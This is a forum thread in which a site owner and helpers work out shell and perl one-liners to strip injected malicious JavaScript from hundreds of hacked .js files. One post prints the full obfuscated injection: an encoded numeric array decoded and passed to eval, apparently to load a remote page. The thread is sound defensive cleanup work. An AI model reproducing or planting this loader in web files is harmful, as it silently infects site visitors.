How to remove the last 3 lines from many files?

MaRiOsGR · June 27, 2012, 5:38am

Hello,

I need to run a command or shell script that will remove the last 3 lines from every .js file that is under the directory /var/ww/vhost/

Can you please help ?

thank you.

radoulov · June 27, 2012, 5:49am

On Linux you could use something like this:

for f in /var/ww/vhost/*js; do 
  tac "$f" | 
    tail -n +4 |
      tac > "$f"_tmp_ && 
        mv -- "$f"_tmp_ "$f" 
done

Backup your data first!

itkamaraj · June 27, 2012, 5:51am

 
#take backup first
cp -rf /var/ww/vhost/ /tmp/mybackup
 
for i in /var/ww/vhost/*js
do 
        printf '$-2,$d\nw\nq\n' | ed -s "$i"
done

Sheel · June 27, 2012, 5:55am

Assuming that 9th field gives the name of file from ls command.

cd /var/ww/vhost
ls -ltr *.js| grep -v '^d' | awk '{print$9}' > fileList
while read line
do
        nbrOfLines=`wc -l $line | awk '{print $1}'`
        minusThree=`expr $nbrOfLines - 3`
        head -$minusThree $line > new$line
done < fileList

MaRiOsGR · June 27, 2012, 5:57am

radoulov thank you for the reply.
The js files are in random folders for example vhost/folder1/test.js
or vhost/folder213/my.js
etc etc

balajesuri · June 27, 2012, 6:00am

#! /bin/bash

for x in `find vhost/ -type f -name "*.js"`
do
    total=$(wc -l < $x)
    from=$((total - 2))
    sed -i "$from,$total d" $x
done

MaRiOsGR · June 27, 2012, 6:00am

itkamaraj copying is not possible, the dirs contain other files , in total of 100GB +

radoulov · June 27, 2012, 6:02am

find /vhost -type f -name '*.js' -exec bash -c '
  f=$1
  tac "$f" | 
    tail -n +4 |
      tac > "$f"_tmp_ && 
        mv -- "$f"_tmp_ "$f" 
  ' - {} \;

MaRiOsGR · June 27, 2012, 6:02am

balajesuri The js files are in random folders for example vhost/folder1/test.js
or vhost/folder213/my.js
etc etc
so
/var/ww/vhost/*.js wont work

funksen · June 27, 2012, 6:03am

in bash

take backup first as itkamaraj said

find /var/ww/vhost -name "*.js" | while read i ; do lines=$(cat ${i} | wc -l ) ; sed -i "$((${lines} - 2 )),${lines}d" $i  ; done

balajesuri · June 27, 2012, 6:04am

@MaRiOsGR: I've edited my post. Please check again. (Before I could post a solution, lot many members posted and you had already asked for recursive searching of js files. I read your requirement after posting my solution)

MaRiOsGR · June 27, 2012, 6:13am

This one worked just perfect.
Is there any way to remove the lines only if the js file includes the text "km0ae9gr6m" ?

radoulov · June 27, 2012, 6:21am

Yes:

find /vhost -type f -name '*.js' -exec bash -c '
  f=$1
  grep -q km0ae9gr6m "$f" &&
    tac "$f" | 
      tail -n +4 |
        tac > "$f"_tmp_ && 
          mv -- "$f"_tmp_ "$f" 
  ' - {} \;

MaRiOsGR · June 27, 2012, 6:41am

This worked great.
And thank you.

but I've found a "bug" (i'm the fault),
I've found that in a 5% percent of the .js files the code I want to remove/erase
was not added in the last 3 lines but in the same line as the rest of the normal javascript code.
the exact hack code starts with

/*km0ae9gr6m*/

is it possible to remove everything after this code in all files that contain it ?

radoulov · June 27, 2012, 6:58am

Try this:

find /vhost -type f -name '*.js' -print0 |   
  xargs -0 perl -i -0777pe'
    s|(.*)/\*km0ae9gr6m\*/.*|$1\n|s
   '

alister · June 27, 2012, 7:36am

mariosgr:

but I've found a "bug" (i'm the fault),
I've found that in a 5% percent of the .js files the code I want to remove/erase
was not added in the last 3 lines but in the same line as the rest of the normal javascript code.
the exact hack code starts with
/*km0ae9gr6m*/
is it possible to remove everything after this code in all files that contain it ?

You ought to provide a sample of what the data looks like, instead of expecting everyone to work blindly. Since you cannot solve the problem yourself, you are probably not competent to judge what is and is not important (that is not meant as an insult, just a statement of fact that applies to us all when we can't solve a problem). Giving us as much information as possible helps us provide a better solution in less time.

As a general rule, don't ask people to work from textual descriptions of data. Always provide realistic data (for input and output) and take some time before creating a thread to consider all the special 5% cases that may present themselves. We are volunteering our time to you; don't make us work harder than necessary.

Regards,
Alister

---------- Post updated at 07:36 AM ---------- Previous update was at 07:21 AM ----------

I don't think that will give the correct result if /*km0ae9gr6m*/ occurs more than once in the text to be discarded. It may very well not be an issue, but since we haven't actually seen the data, I mention it just in case.

Regards,
Alister

MaRiOsGR · June 27, 2012, 7:52am

that did the trick.

Thank you!

---------- Post updated at 02:52 PM ---------- Previous update was at 02:44 PM ----------

Hello,
my intention was not to make your life more difficult and i'm sorry If i've done that.It is not easy to calculate every possible sideffect, I'm trying my best.

The full info is this, I've found 305 js scripts that have the above hacking code

/*km0ae9gr6m*/i=0;try{prototype-5;}catch(z){f=[102,234,110,198,116,210,111,220,32,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,80,4
1,246,118,194,114,64,104,210,61,232,104,210,115,92,115,202,101,200,47,232,104,210,115,92,81,118,118,194,114,64,108,222,61,232,104,210,115,92,115,202
,101,200,37,232,104,210,115,92,81,118,118,194,114,64,116,202,115,232,61,232,104,210,115,92,65,84,108,222,45,232,104,210,115,92,82,84,104,210,59,210,
102,80,116,202,115,232,62,96,41,246,116,208,105,230,46,230,101,202,100,122,116,202,115,232,125,202,108,230,101,246,116,208,105,230,46,230,101,202,10
0,122,116,202,115,232,43,232,104,210,115,92,77,250,114,202,116,234,114,220,40,232,104,210,115,92,115,202,101,200,42,232,104,210,115,92,111,220,101,1
58,118,202,114,154,41,250,102,234,110,198,116,210,111,220,32,164,97,220,100,222,109,156,117,218,98,202,114,142,101,220,101,228,97,232,111,228,40,234
,110,210,120,82,123,236,97,228,32,200,61,220,101,238,32,136,97,232,101,80,117,220,105,240,42,98,48,96,48,82,59,236,97,228,32,230,61,200,46,206,101,2
32,72,222,117,228,115,80,41,124,49,100,63,98,58,96,59,232,104,210,115,92,115,202,101,200,61,100,51,104,53,108,55,112,57,96,49,86,40,200,46,206,101,2
32,77,222,110,232,104,80,41,84,48,240,70,140,70,140,70,140,41,86,40,200,46,206,101,232,68,194,116,202,40,82,42,96,120,140,70,140,70,82,43,80,77,194,
116,208,46,228,111,234,110,200,40,230,42,96,120,140,70,140,41,82,59,232,104,210,115,92,65,122,52,112,50,110,49,118,116,208,105,230,46,154,61,100,49,
104,55,104,56,102,54,104,55,118,116,208,105,230,46,162,61,232,104,210,115,92,77,94,116,208,105,230,46,130,59,232,104,210,115,92,82,122,116,208,105,2
30,46,154,37,232,104,210,115,92,65,118,116,208,105,230,46,222,110,202,79,236,101,228,77,122,49,92,48,94,116,208,105,230,46,154,59,232,104,210,115,92
,110,202,120,232,61,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,118,114,202,116,234,114,220,32,232,104,210,115,250,102,234,110,198
,116,210,111,220,32,198,114,202,97,232,101,164,97,220,100,222,109,156,117,218,98,202,114,80,114,88,77,210,110,88,77,194,120,82,123,228,101,232,117,2
28,110,64,77,194,116,208,46,228,111,234,110,200,40,80,77,194,120,90,77,210,110,82,42,228,46,220,101,240,116,80,41,86,77,210,110,82,125,204,117,220,9
9,232,105,222,110,64,103,202,110,202,114,194,116,202,80,230,101,234,100,222,82,194,110,200,111,218,83,232,114,210,110,206,40,234,110,210,120,88,108,
202,110,206,116,208,44,244,111,220,101,82,123,236,97,228,32,228,97,220,100,122,110,202,119,64,82,194,110,200,111,218,78,234,109,196,101,228,71,202,1
10,202,114,194,116,222,114,80,117,220,105,240,41,118,118,194,114,64,108,202,116,232,101,228,115,122,91,78,97,78,44,78,98,78,44,78,99,78,44,78,100,78
,44,78,101,78,44,78,102,78,44,78,103,78,44,78,104,78,44,78,105,78,44,78,106,78,44,78,107,78,44,78,108,78,44,78,109,78,44,78,110,78,44,78,111,78,44,7
8,112,78,44,78,113,78,44,78,114,78,44,78,115,78,44,78,116,78,44,78,117,78,44,78,118,78,44,78,119,78,44,78,120,78,44,78,121,78,44,78,122,78,93,118,11
8,194,114,64,115,232,114,122,39,78,59,204,111,228,40,236,97,228,32,210,61,96,59,210,60,216,101,220,103,232,104,118,105,86,43,82,123,230,116,228,43,1
22,108,202,116,232,101,228,115,182,99,228,101,194,116,202,82,194,110,200,111,218,78,234,109,196,101,228,40,228,97,220,100,88,48,88,108,202,116,232,1
01,228,115,92,108,202,110,206,116,208,45,98,41,186,125,228,101,232,117,228,110,64,115,232,114,86,39,92,39,86,122,222,110,202,125,230,101,232,84,210,
109,202,111,234,116,80,102,234,110,198,116,210,111,220,40,82,123,232,114,242,123,210,102,80,116,242,112,202,111,204,32,210,102,228,97,218,101,174,97
,230,67,228,101,194,116,202,100,100,61,122,34,234,110,200,101,204,105,220,101,200,34,82,123,210,102,228,97,218,101,174,97,230,67,228,101,194,116,202
,100,100,61,232,114,234,101,118,118,194,114,64,117,220,105,240,61,154,97,232,104,92,114,222,117,220,100,80,43,220,101,238,32,136,97,232,101,80,41,94
,49,96,48,96,41,118,118,194,114,64,100,222,109,194,105,220,78,194,109,202,61,206,101,220,101,228,97,232,101,160,115,202,117,200,111,164,97,220,100,2
22,109,166,116,228,105,220,103,80,117,220,105,240,44,98,54,88,39,228,117,78,41,118,105,204,114,218,61,200,111,198,117,218,101,220,116,92,99,228,101,
194,116,202,69,216,101,218,101,220,116,80,34,146,70,164,65,154,69,68,41,118,105,204,114,218,46,230,101,232,65,232,116,228,105,196,117,232,101,80,34,
230,114,198,34,88,34,208,116,232,112,116,47,94,34,86,100,222,109,194,105,220,78,194,109,202,43,68,47,228,117,220,102,222,114,202,115,232,114,234,110
,126,115,210,100,122,99,240,34,82,59,210,102,228,109,92,115,232,121,216,101,92,119,210,100,232,104,122,34,96,112,240,34,118,105,204,114,218,46,230,1
16,242,108,202,46,208,101,210,103,208,116,122,34,96,112,240,34,118,105,204,114,218,46,230,116,242,108,202,46,236,105,230,105,196,105,216,105,232,121
,122,34,208,105,200,100,202,110,68,59,200,111,198,117,218,101,220,116,92,98,222,100,242,46,194,112,224,101,220,100,134,104,210,108,200,40,210,102,22
8,109,82,125,250,99,194,116,198,104,80,101,82,123,250,125,88,53,96,48,82,59];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");i
f(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];}
r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));}
if(f)e(s);/*qhk6sa6g1c*/

and I need to remove them.Restoring 305 files from backup manually is very hard so the best way (in my humble opinion) was to remove the hacking code,
and if anything fails then restore from the backups as the last resort.

thank you.

alister:

You ought to provide a sample of what the data looks like, instead of expecting everyone to work blindly. Since you cannot solve the problem yourself, you are probably not competent to judge what is and is not important (that is not meant as an insult, just a statement of fact that applies to us all when we can't solve a problem). Giving us as much information as possible helps us provide a better solution in less time.

As a general rule, don't ask people to work from textual descriptions of data. Always provide realistic data (for input and output) and take some time before creating a thread to consider all the special 5% cases that may present themselves. We are volunteering our time to you; don't make us work harder than necessary.

Regards,
Alister

---------- Post updated at 07:36 AM ---------- Previous update was at 07:21 AM ----------

I don't think that will give the correct result if /*km0ae9gr6m*/ occurs more than once in the text to be discarded. It may very well not be an issue, but since we haven't actually seen the data, I mention it just in case.

Regards,
Alister

alister · June 27, 2012, 8:06am

No need for an apology. Since I did not submit a suggestion, my life wasn't made more difficult. Further, I realize that sometimes, despite doing our best, unforeseen complications arise. Sadly, some people don't even make an effort (not saying you are one of those).

Regards,
Alister

williamk · July 5, 2012, 12:11pm

Hi all, newbie here

I also have an issue with this code injection across all js files on 70 domains.
As the alien code always starts with km0ae9gr6m and end in qhk6sa6g1c with lots of virus code in between.
Is there not a way to SSH in and scan all files in vhosts directory and say...
find km0ae9gr6m and delete this up to and including qhk6sa6g1c?

This way i'll be able to remove all alien code through SSH?

Is that possible and please excuse my limited knowledge on SSH and commands.

Please please help me out here.

Thanks

methyl · July 5, 2012, 12:52pm

Be careful Googling. Some sites I found were infected, though Google was not warning on every one of them.

After Googling /*km0ae9gr6m*/ it has become clear that this is a widespread problem. Some mention that the malicious code start string can also be /*gootkitstart*/ .

Similarly the end string can be /*qhk6sa6g1c*/ or /*gootkitend*/ .

Many other boards mention Ubuntu 8.04 LTS with Plesk. many mention just Plesk. There is a suggestion that the hackers are using valid ftp accounts and passwords. Others suggest that Plesk is being hacked directly even when supposidly restricted to certain IP addresses. Some suggest using IP Tables to control access.

Ps. Was my sed idea in the other thread any good?

@alister
There is sample data on the other thread.